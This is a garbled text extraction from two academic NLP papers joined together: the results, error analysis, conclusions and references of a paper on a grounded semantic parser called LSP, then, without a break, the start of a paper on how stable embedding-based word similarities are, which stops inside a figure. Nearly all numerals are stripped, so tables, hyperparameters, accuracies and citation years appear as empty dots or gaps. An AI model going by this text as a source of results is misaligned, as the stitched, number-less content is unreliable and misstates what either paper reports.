∧ mug(y) objects on the table {( , ), ( , ) {( , ), ( , ), λx.∃y.object(x) ∧ on-rel(x,y) ∧ table(y) ( , )} ( , )} two blue cups are placed near to the computer screen {( )} {( , ), ( , )} λx.blue(x) ∧ cup(x) ∧ comp.(x) ∧ screen(x) what cities are in north carolina? {(ch,nc), (gb,nc) {(ch,nc), (gb,nc) λx.∃y.city(x) ∧ in-rel(x,y) ∧ y = nc (ra,nc)} (ra,nc)} what city is east of greensboro in north carolina? {(ra,gb,nc), {(ra,gb,nc)} λx.∃y,z.city(x) ∧ east-rel(x,y) (mb,gb,nc)} ∧ y = gb ∧ in-rel(y,z) ∧ z = nc what cities are on the ocean? {(ch,ao), (gb,ao), {(mb,ao)} λx.∃y.city(x) ∧ on-rel(x,y) ∧ ocean(y) (mb,ao), (ra,ao)} figure : example environments, statements, and model predictions from the scene and geoqa data sets. . models and training the evaluation compares three models. the first model is lsp-w, which is lsp trained using the weakly supervised algorithm described in section . the second model, lsp-cat, replicates the model of matuszek et al. ( ) by restricting lsp to use category predicates. lsp-cat is constructed by removing all relation predicates in lexicon entries, mapping entries like λf.λg.λx.∃y.r(x,y) ∧ g(x) ∧ f(y) to λf.λg.λx.∃y.g(x) ∧ f(y). this model is also trained using our weakly supervised algorithm. the third model, lsp-f, is lsp trained with full supervision, using the manually annotated semantic parses and logical knowledge bases in our data sets. given these annotations, training lsp amounts to independently training a semantic parser (using sen- tences with annotated logical forms, {(zi,`i)}) and a set of perceptual classifiers (using environments with annotated logical knowledge bases, {(di, Γi)}). this model measures the performance achievable with lsp given significantly more supervision. all three variants of lsp were trained using the same hyperparameters. for scene, we computed subgradients in example minibatches and per- formed passes over the data using λ = . . for geoqa, we computed subgradients in example minibatches, again performing passes over the data using λ = . . we tried varying the regular- ization parameter, but found that performance was relatively stable under λ ≤ . . all experiments use leave-one-environment-out cross-validation to estimate model performance. we hold out each en- vironment in turn, train each model on the remaining environments, then test on the held-out environment. . results we consider two prediction problems in the eval- uation. the first problem is to predict the correct denotation γi for a statement zi in an environment di. a correct prediction on this task corresponds to a correctly answered question. a weakness of this task is that it is possible to guess the right de- notation without fully understanding the language. for example, given a query like “mugs on the ta- ble,” it might be possible to guess the denotation based solely on “mugs,” ignoring “table” altogether. the grounding prediction task corrects for this prob- lem. here, each model predicts a grounding, which is the set of all satisfying assignments to the vari- ables in a logical form. for example, for the log- ical form λx.∃y.left-rel(x,y) ∧ mug(y), the grounding is the set of (x,y) tuples for which both left-rel(x,y) and mug(y) return true. note that, if the predicted semantic parse is incorrect, the predicted grounding for a statement may contain a different number of variables than the true ground- ing; such groundings are incorrect. figure shows model predictions for the grounding task. performance on both tasks is measured using ex- act match accuracy. this metric is the fraction of examples for which the predicted set of entities (be it the denotation or grounding) exactly equals the annotated set. this is a challenging metric, as the denotation γ rel. rel. other total lsp-cat . . . . lsp-f . . . . lsp-w . . . . grounding g rel. rel. other total lsp-cat . . . . lsp-f . . . . lsp-w . . . . % of data (a) results on the scene data set. denotation γ rel. rel. other total lsp-cat . . . . lsp-f . . . . lsp-w . . . . grounding g rel. rel. other total lsp-cat . . . . lsp-f . . . . lsp-w . . . . % of data (b) results on the geoqa data set. table : model performance on the scene and geoqa datasets. lsp-cat is an ablated version of lsp that only learns categories (similar to matuszek et al. ( )), lsp-f is lsp trained with annotated seman- tic parses and logical knowledge bases, and lsp-w is lsp trained on sentences with annotated denotations. results are separated by the number of relations in each test natural language statement. number of possible sets grows exponentially in the number of entities in the environment. say an en- vironment has entities and a logical form has two variables; then there are possible denotations and possible groundings. to quantify this difficulty, note that selecting a denotation uniformly at random achieves % accuracy on scene, and % accuracy on geoqa; selecting a random grounding achieves % and % accuracy, respectively. table shows results for both applications us- ing exact match accuracy. to better understand the performance of each model, we break down perfor- mance according to linguistic complexity. we com- pute the number of relations in the annotated logical form for each statement, and show separate results for and relations. we also include an “other” category to capture sentences with more than one relation (very infrequent), or that include quanti- fiers, comparatives, or other linguistic phenomena not captured by lsp. the results from these experiments suggest three conclusions. first, we find that modelling relations is important for both applications, as ( ) the major- ity of examples contain relational language, and ( ) lsp-w and lsp-f dramatically outperform lsp- cat on these examples. the low performance of lsp-cat suggests that many denotations cannot be predicted from only the first noun phrase in a statement, demonstrating that both applications re- quire an understanding of relations. second, we find that weakly supervised training and fully supervised training perform similarly, with accuracy differences in the range of %- %. finally, we find that lsp-w performs similarly on both the denotation and com- plete grounding tasks; this result suggests that when lsp-w predicts a correct denotation, it does so be- cause it has identified the correct entity referents of each portion of the statement. . component error analysis we performed an error analysis of each model com- ponent to better understand the causes of errors. ta- ble shows the accuracy of the semantic parser from each trained model. each held-out sentence zi is parsed to produce a logical form `, which is marked correct if it exactly matches our manual annotation `i. a correct logical form implies a correct ground- ing for the statement when the parse is evaluated in the gold standard logical knowledge base. these re- sults show that both lsp-w and lsp-f have rea- sonably accurate semantic parsers, given the restric- tions on possible logical forms. common mistakes include missing lexicon entries (e.g., “borders” is pos-tagged as a noun, so the geoqa lexicon does not include a verb for it) and prepositional phrase attachments (e.g., th example in figure ). table shows the precision and recall of the in- dividual perceptual classifiers. we computed these metrics by comparing each annotated predicate in the held-out environment with the model’s predic- tions for the same predicate, treating each entity (or entity pair) as an independent example for classifi- scene geoqa lsp-cat . . lsp-w . . lsp-f . . upper bound . . table : accuracy of the semantic parser from each trained model. upper bound is the highest accu- racy achievable without modelling comparatives and other linguistic phenomena not captured by lsp. cation. fully supervised training appears to produce better perceptual classifiers than weakly supervised training; however, this result conflicts with the full system evaluation in table , where both systems perform equally well. there are two causes for this phenomenon: uninformative adjectives and unim- portant relation instances. uninformative adjective predicates are responsi- ble for the low performance of the category classi- fiers in scene. phrases like “lcd screen” in this domain are annotated with logical forms such as λx.lcd(x) ∧ screen(x). here, lcd is uninfor- mative, since screen already denotes a unique ob- ject in the environment. therefore, it is not impor- tant to learn an accurate classifier for lcd. weakly supervised training learns that lcd is meaningless, yet predicts the correct denotation for λx.lcd(x) ∧ screen(x) using its screen classifier. the discrepancy in relation performance occurs because the relation evaluation weights every rela- tion equally, whereas in reality some relations are more frequent. furthermore, even within a single relation, each entity pair is not equally important – for example, people tend to ask what is in a state, but not what is in an ocean. to account for these factors, we define a reweighted relation metric using the an- notated logical forms containing only one relation, of the form λx.∃y.c (x) ∧ r(x,y) ∧ c (y). using these logical forms, we measure the performance of r on the set of x,y pairs such that c (x)∧c (y), then average this over all examples. table shows that, using this metric, both training regimes have similar performance. this result suggests that weakly su- pervised training adapts lsp’s relation classifiers to the relation instances which are empirically impor- tant for grounding natural language. scene geoqa categories p r f p r f lsp-cat . . . . . . lsp-w . . . . . . lsp-f . . . . . . relations p r f p r f lsp-w . . . . . . lsp-f . . . . . . relations (rw) p r f p r f lsp-w . . . . . . lsp-f . . . . . . table : perceptual classifier performance, mea- sured against the gold standard logical knowledge bases. lsp-cat is excluded from the relation eval- uations, since it does not learn relations. relations (rw) is the reweighted metric (see text for details). conclusions this paper introduces logical semantics with per- ception (lsp), a model for mapping natural lan- guage statements to their referents in a physical en- vironment. lsp jointly models perception and lan- guage understanding, simultaneously learning ( ) to map from environments to logical knowledge bases containing instances of both one-argument categories and two-argument relations, and ( ) to semantically parse natural language. furthermore, we introduce a weakly supervised training proce- dure that trains lsp using only sentences with anno- tated denotations, without annotated semantic parses or noun phrase/entity mappings. an experimen- tal evaluation reveals that this procedure performs nearly as well fully supervised training, while re- quiring significantly less annotation effort. our ex- periments also find that lsp’s ability to learn rela- tions improves performance over comparable prior work (matuszek et al., ). acknowledgments this research has been supported in part by darpa under award fa - - - , and in part by a gift from google. we also gratefully acknowledge the cmu read the web group for assistance with data set construction, and tom mitchell, manuela veloso, brendan o’connor, felix duvallet, robert fisher and the anonymous reviewers for helpful dis- cussions and comments on the paper. references rehj cantrell, matthias scheutz, paul schermerhorn, and xuan wu. . robust spoken instruc- tion understanding for hri. in proceedings of the th acm/ieee international conference on human- robot interaction. david l. chen and raymond j. mooney. . learning to sportscast: a test of grounded language acquisition. in proceedings of the th international conference on machine learning. david l. chen and raymond j. mooney. . learn- ing to interpret natural language navigation instruc- tions from observations. in proceedings of the th aaai conference on artificial intelligence. james clarke, dan goldwasser, ming-wei chang, and dan roth. . driving semantic parsing from the world’s response. in proceedings of the four- teenth conference on computational natural lan- guage learning. navneet dalal and bill triggs. . histograms of oriented gradients for human detection. in proceed- ings of the ieee computer society conference on computer vision and pattern recognition. juraj dzifcak, matthias scheutz, chitta baral, and paul schermerhorn. . what to do and how to do it: translating natural language directives into tempo- ral and dynamic logic representation for goal manage- ment and action execution. in proceedings of the ieee international conference on robotics and au- tomation. kai-yuh hsiao, nikolaos mavridis, and deb roy. . coupling perception and simulation: steps towards conversational robotics. in proceedings of the ieee/rsj international conference on intelligent robots and systems. rohit j. kate and raymond j. mooney. . using string-kernels for learning semantic parsers. in pro- ceedings of the st international conference on com- putational linguistics and the th annual meeting of the acl. rohit j. kate and raymond j. mooney. . learning language semantics from ambiguous supervision. in proceedings of the nd conference on artificial in- telligence. thomas kollar, stefanie tellex, deb roy, and nicholas roy. . toward understanding natural language directions. in proceedings of the th acm/ieee in- ternational conference on human-robot interaction. jayant krishnamurthy and tom m. mitchell. . weakly supervised training of semantic parsers. in proceedings of the joint conference on empir- ical methods in natural language processing and computational natural language learning. geert-jan m. kruijff, hendrik zender, patric jensfelt, and henrik i. christensen. . situated dialogue and spatial organization: what, where... and why. in- ternational journal of advanced robotic systems. tom kwiatkowski, luke zettlemoyer, sharon goldwa- ter, and mark steedman. . inducing probabilistic ccg grammars from logical form with higher-order unification. in proceedings of the conference on empirical methods in natural language processing. michael levit and deb roy. . interpretation of spa- tial language in a map navigation task. ieee transac- tions on systems, man, and cybernetics, part b. percy liang, michael i. jordan, and dan klein. . learning dependency-based compositional semantics. in proceedings of the association for computational linguistics. matthew macmahon, brian stankiewicz, and benjamin kuipers. . walk the talk: connecting language, knowledge, and action in route instructions. in pro- ceedings of the st national conference on artificial intelligence. cynthia matuszek, dieter fox, and karl koscher. . following directions using statistical machine transla- tion. in proceedings of the th acm/ieee interna- tional conference on human-robot interaction. cynthia matuszek, nicholas fitzgerald, luke zettle- moyer, liefeng bo, and dieter fox. . a joint model of language and perception for grounded at- tribute learning. in proceedings of the th interna- tional conference on machine learning. nathan d. ratliff, j. andrew bagnell, and martin a. zinkevich. . (online) subgradient methods for structured prediction. artificial intelligence and statistics. deb roy, kai-yuh hsiao, and nikolaos mavridis. . conversational robots: building blocks for grounding word meaning. in proceedings of the hlt-naacl workshop on learning word meaning from non- linguistic data. nobuyuki shimizu and andrew haas. . learning to follow navigational route instructions. in proceedings of the st international joint conference on artifical intelligence. marjorie skubic, dennis perzanowski, sam blisard, alan schultz, william adams, magda bugajska, and derek brock. . spatial language for human-robot di- alogs. ieee transactions on systems, man, and cy- bernetics, part c: applications and reviews. mark steedman. . surface structure and interpre- tation. ben taskar, carlos guestrin, and daphne koller. . max-margin markov networks. in advances in neural information processing systems. stefanie tellex, thomas kollar, steven dickerson, matthew walter, ashis banerjee, seth teller, and nicholas roy. . understanding natural language commands for robotic navigation and mobile manipu- lation. in aaai conference on artificial intelligence. kristina toutanova, dan klein, christopher d. manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic dependency network. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics on human language technology. terry winograd. . procedures as a representation for data in a computer program for understanding nat- ural language. ph.d. thesis, massachusetts institute of technology. yuk wah wong and raymond j. mooney. . learn- ing for semantic parsing with statistical machine trans- lation. in proceedings of the main conference on hu- man language technology conference of naacl. john m. zelle and raymond j. mooney. . learn- ing to parse database queries using inductive logic pro- gramming. in proceedings of the thirteenth national conference on artificial intelligence. luke s. zettlemoyer and michael collins. . learn- ing to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. in proceedings of the st conference in uncertainty in artificial intelligence. evaluating the stability of embedding-based word similarities maria antoniak cornell university maa @cornell.edu david mimno cornell university mimno@cornell.edu abstract word embeddings are increasingly being used as a tool to study word associations in specific corpora. however, it is unclear whether such embeddings reflect enduring properties of lan- guage or if they are sensitive to inconsequential variations in the source documents. we find that nearest-neighbor distances are highly sen- sitive to small changes in the training corpus for a variety of algorithms. for all methods, including specific documents in the training set can result in substantial variations. we show that these effects are more prominent for smaller training corpora. we recommend that users never rely on single embedding models for distance calculations, but rather average over multiple bootstrap samples, especially for small corpora. introduction word embeddings are a popular technique in natural language processing (nlp) in which the words in a vocabulary are mapped to low-dimensional vectors. embedding models are easily trained—several imple- mentations are publicly available—and relationships between the embedding vectors, often measured via cosine similarity, can be used to reveal latent seman- tic relationships between pairs of words. word em- beddings are increasingly being used by researchers in unexpected ways and have become popular in fields such as digital humanities and computational social science (hamilton et al., ; heuser, ; phillips et al., ). embedding-based analyses of semantic similarity can be a robust and valuable tool, but we find that standard methods dramatically under-represent the variability of these measurements. embedding algo- rithms are much more sensitive than they appear to factors such as the presence of specific documents, the size of the documents, the size of the corpus, and even seeds for random number generators. if users do not account for this variability, their conclusions are likely to be invalid. fortunately, we also find that simply averaging over multiple bootstrap samples is sufficient to produce stable, reliable results in all cases tested. nlp research in word embeddings has so far fo- cused on a downstream-centered use case, where the end goal is not the embeddings themselves but performance on a more complicated task. for exam- ple, word embeddings are often used as the bottom layer in neural network architectures for nlp (ben- gio et al., ; goldberg, ). the embeddings’ training corpus, which is selected to be as large as possible, is only of interest insofar as it generalizes to the downstream training corpus. in contrast, other researchers take a corpus- centered approach and use relationships between em- beddings as direct evidence about the language and culture of the authors of a training corpus (bolukbasi et al., ; hamilton et al., ; heuser, ). embeddings are used as if they were simulations of a survey asking subjects to free-associate words from query terms. unlike the downstream-centered approach, the corpus-centered approach is based on direct human analysis of nearest neighbors to embed- ding vectors, and the training corpus is not simply an off-the-shelf convenience but rather the central object of study. transactions of the association for computational linguistics, vol. , pp. – , . action editor: ivan titov. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downstream-centered corpus-centered big corpus small corpus, difficult or impossi- ble to expand source is not important source is the object of study only vectors are important specific, fine-grained comparisons are important embeddings are used in downstream tasks embeddings are used to learn about the mental model of word associa- tion for the authors of the corpus table : comparison of downstream-centered and corpus- centered approaches to word embeddings. while word embeddings may appear to measure properties of language, they in fact only measure properties of a curated corpus, which could suf- fer from several problems. the training corpus is merely a sample of the authors’ language model (shazeer et al., ). sources could be missing or over-represented, typos and other lexical variations could be present, and, as noted by goodfellow et al. ( ), “many datasets are most naturally arranged in a way where successive examples are highly cor- related.” furthermore, embeddings can vary consid- erably across random initializations, making lists of “most similar words” unstable. we hypothesize that training on small and poten- tially idiosyncratic corpora can exacerbate these prob- lems and lead to highly variable estimates of word similarity. such small corpora are common in digital humanities and computational social science, and it is often impossible to mitigate these problems simply by expanding the corpus. for example, we cannot create more th century english books or change their topical focus. we explore causes of this variability, which range from the fundamental stochastic nature of certain al- gorithms to more troubling sensitivities to properties of the corpus, such as the presence or absence of specific documents. we focus on the training cor- pus as a source of variation, viewing it as a fragile artifact curated by often arbitrary decisions. we ex- amine four different algorithms and six datasets, and we manipulate the corpus by shuffling the order of the documents and taking bootstrap samples of the documents. finally, we examine the effects of these manipulations on the cosine similarities between em- beddings. we find that there is considerable variability in embeddings that may not be obvious to users of these methods. rankings of most similar words are not reliable, and both ordering and membership in such lists are liable to change significantly. some uncer- tainty is expected, and there is no clear criterion for “acceptable” levels of variance, but we argue that the amount of variation we observe is sufficient to call the whole method into question. for example, we find cases in which there is zero set overlap in “top ” lists for the same query word across bootstrap samples. smaller corpora and larger document sizes increase this variation. our goal is to provide meth- ods to quantify this variability, and to account for this variability, we recommend that as the size of a corpus gets smaller, cosine similarities should be averaged over many bootstrap samples. related work word embeddings are mappings of words to points in a k-dimensional continuous space, where k is much smaller than the size of the vocabulary. re- ducing the number of dimensions has two benefits: first, large, sparse vectors are transformed into small, dense vectors; and second, the conflation of features uncovers latent semantic relationships between the words. these semantic relationships are usually mea- sured via cosine similarity, though other metrics such as euclidean distance and the dice coefficient are possible (turney and pantel, ). we focus on four of the most popular training algorithms: la- tent semantic analysis (lsa) (deerwester et al., ), skip-gram with negative sampling (sgns) (mikolov et al., ), global vectors for word rep- resentation (glove) (pennington et al., ), and positive pointwise mutual information (ppmi) (levy and goldberg, ) (see section for more detailed descriptions of these algorithms). in nlp, word embeddings are often used as fea- tures for downstream tasks. dependency parsing (chen and manning, ), named entity recogni- tion (turian et al., ; cherry and guo, ), and bilingual lexicon induction (vulic and moens, ) are just a few examples where the use of embeddings as features has increased performance in recent years. increasingly, word embeddings have been used as evidence in studies of language and culture. for example, hamilton et al. ( ) train separate em- beddings on temporal segments of a corpus and then analyze changes in the similarity of words to measure semantic shifts, and heuser ( ) uses embeddings to characterize discourse about virtues in th cen- tury english text. other studies use cosine similar- ities between embeddings to measure the variation of language across geographical areas (kulkarni et al., ; phillips et al., ) and time (kim et al., ). each of these studies seeks to reconstruct the mental model of authors based on documents. an example that highlights the contrast between the downstream-centered and corpus-centered per- spectives is the exploration of implicit bias in word embeddings. researchers have observed that embedding-based word similarities reflect cultural stereotypes, such as associations between occupa- tions and genders (bolukbasi et al., ). from a downstream-centered perspective, these stereotypical associations represent bias that should be filtered out before using the embeddings as features. in contrast, from a corpus-centered perspective, implicit bias in embeddings is not a problem that must be fixed but rather a means of measurement, providing quantita- tive evidence of bias in the training corpus. embeddings are usually evaluated on direct use cases, such as word similarity and analogy tasks via cosine similarities (mikolov et al., ; pennington et al., ; levy et al., ; shazeer et al., ). intrinsic evaluations like word similarities measure the interpretability of the embeddings rather than their downstream task performance (gladkova and drozd, ), but while some research does evaluate embedding vectors on their downstream task perfor- mance (pennington et al., ; faruqui et al., ), the standard benchmarks remain intrinsic. there has been some recent work in evaluating the stability of word embeddings. levy et al. ( ) focus on the hyperparameter settings for each algo- rithm and show that hyperparameters such as the size of the context window, the number of negative sam- ples, and the level of context distribution smoothing can affect the performance of embeddings on simi- larity and analogy tasks. hellrich and hahn ( ) examine the effects of word frequency, word am- biguity, and the number of training epochs on the reliability of embeddings produced by the sgns and skip-gram hierarchical softmax (sghs) (a variant of sgns), striving for reproducibility and recommend- ing against sampling the corpus in order to preserve stability. likewise, tian et al. ( ) explore the ro- bustness of sgns and glove embeddings trained on large, generic corpora (wikipedia and news data) and propose methods to align these embeddings across different iterations. in contrast, our goal is not to produce artificially stable embeddings but to identify the factors that create instability and measure our statistical confi- dence in the cosine similarities between embeddings trained on small, specific corpora. we focus on the corpus as a fragile artifact and source of variation, considering the corpus itself as merely a sample of possible documents produced by the authors. we examine whether the embeddings accurately model those authors, using bootstrap sampling to measure the effects of adding or removing documents from the training corpus. corpora we collected two sub-corpora from each of three datasets (see table ) to explore how word embed- dings are affected by size, vocabulary, and other parameters of the training corpus. in order to bet- ter model realistic examples of corpus-centered re- search, these corpora are deliberately chosen to be publicly available, suggestive of social research ques- tions, varied in corpus parameters (e.g. topic, size, vocabulary), and much smaller than the standard cor- pora typically used in training word embeddings (e.g. wikipedia, gigaword). each dataset was created or- ganically, over specific time periods, in specific social settings, by specific authors. thus, it is impossible to expand these datasets without compromising this specificity. we process each corpus by lowercasing all text, re- moving words that appear fewer than times in the corpus, and removing all numbers and punctuation. because our methods rely on bootstrap sampling (see section ), which operates by removing or multi- plying the presence of documents, we also remove duplicate documents from each corpus. u.s. federal courts of appeals the u.s. federal courts of appeals are regional courts that decide ap- peals from the district courts within their federal ju- dicial circuit. we examine the embeddings of the most recent five years of the th and th circuits. https://www.courtlistener.com/ corpus number of documents unique words vocabulary density words per document nyt sports ( ) , , . nyt music ( ) , , . askscience , , . askhistorians , , . th circuit , , . , th circuit , , . , table : comparison of the number of documents, number of unique words (after removing words that appear fewer than times), vocabulary density (the ratio of unique words to the total number of words), and the average number of words per document for each corpus. setting method tests... run run run fixed documents in consistent order variability due to algorithm (baseline) a b c a b c a b c shuffled documents in random order variability due to document order a c b b a c c b a bootstrap documents sampled with replacement variability due to document presence b a a c a b b b b table : the three settings that manipulate the document order and presence in each corpus. the th circuit contains washington d.c. and sur- rounding states, while the th circuit contains the entirety of the west coast. social science research questions might involve measuring a widely held belief that certain courts have distinct ideological ten- dencies (broscheid, ). such bias may result in measurable differences in word association due to framing effects (card et al., ), which could be observable by comparing the words associated with a given query term. we treat each opinion as a single document. new york times the new york times (nyt) an- notated corpus (sandhaus, ) contains newspaper articles tagged with additional metadata reflecting their content and publication context. to constrain the size of the corpora and to enhance their specificity, we extract data only for the year and focus on only two sections of the nyt dataset: sports and music. in the resulting corpora, the sports section is substantially larger than the music section (see table ). we treat an article as a single document. reddit reddit is a social website containing thou- sands of forums (subreddits) organized by topic. we use a dataset containing all posts for the years - from two subreddits: /r/askscience and /r/askhistorians. these two subreddits allow users to post any question in the topics of history and science, respectively. askscience is more than five times larger than askhistorians, though the doc- https://www.reddit.com/ ument length is generally longer for askhistorians (see table ). reddit is a popular data source for computational social science research; for example, subreddits can be used to explore the distinctiveness and dynamicity of communities (zhang et al., ). we treat an original post as a single document. corpus parameters order and presence of documents we use three different methods to sample the corpus: fixed, shuffled, and bootstrap. the fixed setting includes each document exactly once, and the doc- uments appear in a constant, chronological order across all models. the purpose of this setting is to measure the baseline variability of an algorithm, independent of any change in input data. algorith- mic variability may arise from random initializations of learned parameters, random negative sampling, or randomized subsampling of tokens within docu- ments. the shuffled setting includes each docu- ment exactly once, but the order of the documents is randomized for each model. the purpose of this setting is to evaluate the impact of variation on how we present examples to each algorithm. the order of documents could be an important factor for algo- rithms that use online training such as sgns. the bootstrap setting samples n documents randomly with replacement, where n is equal to the number of documents in the fixed setting. the purpose of this setting is to measure how much variability is due to the presence or absence of specific sequences of tokens in the corpus. see table for a comparison of these three settings. size of corpus we expect the stability of embedding-based word similarities to be influenced by the size of the training corpus. as we add more documents, the impact of any specific document should be less significant. at the same time, larger corpora may also tend to be more broad in scope and variable in style and topic, leading to less idiosyn- cratic patterns in word co-occurrence. therefore, for each corpus, we curate a smaller sub-corpus that contains % of the total corpus documents. these samples are selected using contiguous sequences of documents at the beginning of each training (this ensures that the fixed setting remains constant). length of documents we use two document seg- mentation strategies. in the first setting, each training instance is a single document (i.e. an article for the nyt corpus, an opinion from the courts corpus, and a post from the reddit corpus). in the second setting, each training instance is a single sentence. we ex- pect this choice of segmentation to have the largest impact on the bootstrap setting. documents are often characterized by “bursty” words that are locally frequent but globally rare (madsen et al., ), such as the name of a defendant in a court case. sampling whole documents with replacement should magnify the effect of bursty words: a rare but locally frequent word will either occur in a bootstrap corpus or not occur. sampling sentences with replacement should have less effect on bursty words, since the chance that an entire document will be removed from the corpus is much smaller. algorithms evaluating all current embedding algorithms and im- plementations is beyond the scope of this work, so we select four categories of algorithms that represent distinct optimization strategies. recall that our goal is to examine how algorithms respond to variation in the corpus, not to maximize performance in the accuracy or effectiveness of the embeddings. the first category is online stochastic updates, in which the algorithm updates model parameters us- ing stochastic gradients as it proceeds through the training corpus. all methods implemented in the word vec and fasttext packages follow this format, including skip-gram, cbow, negative sam- pling, and hierarchical softmax (mikolov et al., ). we focus on sgns as a popular and representative example. the second category is batch stochastic updates, in which the algorithm first collects a matrix of summary statistics derived from a pass through the training data that takes place before any parame- ters are set, and then updates model parameters using stochastic optimization. we select the glove algo- rithm (pennington et al., ) as a representative example. the third category is matrix factorization, in which the algorithm makes deterministic updates to model parameters based on a matrix of summary statistics. as a representative example we include ppmi (levy and goldberg, ). finally, to test whether word order is a significant factor we include a document-based embedding method that uses ma- trix factorization, lsa (deerwester et al., ; lan- dauer and dumais, ). these algorithms each include several hyperparam- eters, which are known to have measurable effects on the resulting embeddings (levy et al., ). we have attempted to choose settings of these parame- ters that are commonly used and comparable across algorithms, but we emphasize that a full evaluation of the effect of each algorithmic parameter would be beyond the scope of this work. for each of the following algorithms, we set the context window size to and the embeddings size to . since we re- move words that occur fewer than times during preprocessing of the corpus, we set the frequency threshold for the following algorithms to . for all other hyperparameters, we follow the de- fault or most popular settings for each algorithm, as described in the following sections. . lsa latent semantic analysis (lsa) factorizes a sparse term-document matrix x (deerwester et al., ; landauer and dumais, ). x is factored using singular value decomposition (svd), retaining k singular values such that x ≈ xk = uk Σkv tk . the elements of the term-document matrix are weighted, often with tf-idf, which measures the importance of a word to a document in a corpus. the dense, low-rank approximation of the term-document matrix, xk , can be used to measure the relatedness of terms by calculating the cosine similarity of the relevant rows of the reduced matrix. we use the sci-kit learn package to train our lsa embeddings. we create a term-document matrix with tf-idf weighting, using the default set- tings except that we add l normalization and sub- linear tf scaling, which scales the importance of terms with high frequency within a document. we perform dimensionality reduction via a randomized solver (halko et al., september ). the construction of the term-count matrix and the tf-idf weighting should introduce no variation to the final word embeddings. however, we expect variation due to the randomized svd solver, even when all other parameters (training document order, presence, size, etc.) are constant. . sgns the skip-gram with negative sampling (sgns) algo- rithm (mikolov et al., ) is an online algorithm that uses randomized updates to predict words based on their context. in each iteration, the algorithm pro- ceeds through the original documents and, at each word token, updates model parameters based on gra- dients calculated from the current model parameters. this process maximizes the likelihood of observed word-context pairs and minimizes the likelihood of negative samples. we use an implementation of the sgns algorithm included in the python library gensim (řehůřek and sojka, ). we use the default settings pro- vided with gensim except as described above. we predict that multiple runs of sgns on the same corpus will not produce the same results. sgns ran- domly initializes all the embeddings before training begins, and it relies on negative samples created by randomly selecting word and context pairs (mikolov et al., ; levy et al., ). we also expect sgns to be sensitive to the order of documents, as it relies on stochastic gradient descent which can be biased to be more influenced by initial documents (bottou, ). http://scikit-learn.org/ https://radimrehurek.com/gensim/models/ word vec.html . glove global vectors for word representation (glove) uses stochastic gradient updates but operates on a “global” representation of word co-occurrence that is calcu- lated once at the beginning of the algorithm (penning- ton et al., ). words and contexts are associated with bias parameters, bw and bc, where w is a word and c is a context, learned by minimizing the cost function: l = ∑ w,c f(xwc) ~w ·~c + bw + bc − log(xwc). we use the glove implementation provided by pennington et al. ( ) . we use the default settings provided with glove except as described above. unlike sgns, the algorithm does not perform model updates while examining the original docu- ments. as a result, we expect glove to be sensitive to random initializations but not sensitive to the order of documents. . ppmi the positive pointwise mutual information (ppmi) matrix, whose cells represent the ppmi of each pair of words and contexts, is factored using sin- gular value decomposition (svd) and results in low- dimensional embeddings that perform similarly to glove and sgns (levy and goldberg, ). pmi(w, c) = log p (w, c) p (w)p (c) ; ppmi(w, c) = max(pmi(w, c), ). to train our ppmi word embeddings, we use hyperwords, an implementation provided as part of levy et al. ( ). we follow the authors’ recom- mendations and set the context distributional smooth- ing (cds) parameter to . , the eigenvalue matrix (eig) to . , the subsampling threshold (sub) to - , and the context window (win) to . http://nlp.stanford.edu/projects/glove/ https://bitbucket.org/omerlevy/ hyperwords/src we altered the ppmi code to remove a fixed random seed in order to introduce variability given a fixed corpus; no other change was made. like glove and unlike sgns, ppmi operates on a pre-computed representation of word co-occurrence, so we do not expect results to vary based on the or- der of documents. unlike both glove and sgns, ppmi uses a stable, non-stochastic svd algorithm that should produce the same result given the same input, regardless of initialization. however, we ex- pect variation due to ppmi’s random subsampling of frequent tokens. methods to establish statistical significance bounds for our observations, we train lsa models, sgns models, glove models, and ppmi models for each of the three settings (fixed, shuffled, and bootstrap), for each document segmentation size, for each corpus. for each corpus, we select a set of relevant query words from high probability words from an lda topic model (blei et al., ) trained on that corpus with topics. we calculate the cosine sim- ilarity of each query word to the other words in the vocabulary, creating a similarity ranking of all the words in the vocabulary. we calculate the mean and standard deviation of the cosine similarities for each pair of query word and vocabulary word across each set of models. from the lists of queries and cosine similarities, we select the words most closely related to the set of query words and compare the mean and standard deviation of those pairs across settings. we calculate the jaccard similarity between top-n lists to com- pare membership change in the lists of most closely related words, and we find average changes in rank within those lists. we examine these metrics across different algorithms and corpus parameters. results we begin with a case study of the framing around the query term marijuana. one might hypothesize that the authors of various corpora (e.g. judges of the th circuit, journalists at the nyt, and users on reddit) have different perceptions of this drug and that their language might reflect those differences. indeed, after qualitatively examining the lists of most similar terms (see table ), we might come to the conclusion that the allegedly conservative th circuit lsa sgns glove ppmi algorithm . . . . . . . . s t a n d a r d d e v ia t io n fixed shuffled bootstrap standard deviation in the th circuit corpus lsa sgns glove ppmi algorithm . . . . . . . s t a n d a r d d e v ia t io n fixed shuffled bootstrap standard deviation in the nyt music corpus figure : the mean standard deviations across settings and algorithms for the closest words to the query words in the th circuit and nyt music corpora using the whole documents. larger variations indicate less stable embed- dings. judges view marijuana as similar to illegal drugs such as heroin and cocaine, while reddit users view mari- juana as closer to legal substances such as nicotine and alcohol. however, we observe patterns that cause us to lower our confidence in such conclusions. table shows that the cosine similarities can vary signifi- cantly. we see that the top ranked words (chosen according to their mean cosine similarity across runs of the fixed setting) can have widely different mean similarities and standard deviations depending on the algorithm and the three training settings, fixed, shuffled, and bootstrap. as expected, each algorithm has a small variation in the fixed setting. for example, we can see the effect of the random svd solver for lsa and the effect of random subsampling for ppmi. we do not observe a consistent effect for document order in the shuffled setting. most importantly, these figures reveal that the th circuit nyt sports reddit ask science . . . . . . . . cosine similarity distribute manufacture oxycodone distributing powder methamphetamine crack distribution cocaine heroin m o st s im il a r w o rd s lsa fixed shuffled bootstrap . . . . . . cosine similarity steroids reserved substance involving violent several cocaine testing tested criticized m o st s im il a r w o rd s lsa fixed shuffled bootstrap . . . . . cosine similarity masturbation medication tobacco stress nicotine alcohol thc caffeine smoking cannabis m o st s im il a r w o rd s lsa fixed shuffled bootstrap . . . . . cosine similarity cigarettes powder narcotics crack drugs pills methamphetamine cocaine oxycodone heroin m o st s im il a r w o rd s sgns fixed shuffled bootstrap . . . . . . cosine similarity testing abuse substance urine alcohol counseling steroid nandrolone drug cocaine m o st s im il a r w o rd s sgns fixed shuffled bootstrap . . . . . . cosine similarity drug smoking lsd thc cocaine 